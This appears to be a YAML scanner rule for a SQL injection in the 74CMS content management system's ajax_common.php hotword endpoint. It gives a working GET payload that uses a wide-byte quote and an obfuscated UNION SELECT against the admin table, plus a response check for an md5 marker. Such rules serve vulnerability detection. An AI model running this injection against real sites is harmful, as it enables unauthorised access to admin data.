product: 骑士74CMS
vName: 74cms-ajax.common.php-sql1
type: SQL注入
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: http://www.2cto.com/article/201405/304552.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(123),3+from+qs_admin%23--
    verify:
      logic: and
      check:
        - body:
            value:
              - 202cb962ac59075b964b07152d234b70
            logic: and
        - status: 200